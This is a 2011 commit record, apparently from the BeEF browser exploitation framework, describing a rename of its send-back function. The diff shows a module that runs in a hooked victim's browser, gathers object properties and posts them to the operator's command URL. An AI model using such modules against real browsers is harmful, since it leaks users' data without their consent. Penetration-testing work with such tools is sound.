Merged new data chopper. Migrated to new request() function. Changed all modules to call send() instead of sendback().

git-svn-id: https://beef.googlecode.com/svn/trunk@787 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
passbe
2011-03-12 01:19:21 +00:00
parent 98c656af3c
commit 15d08b84d6
37 changed files with 471 additions and 373 deletions

View File

@@ -8,11 +8,11 @@ beef.execute(function() {
result+= n + " " + e[n] + "\n";
}
beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
});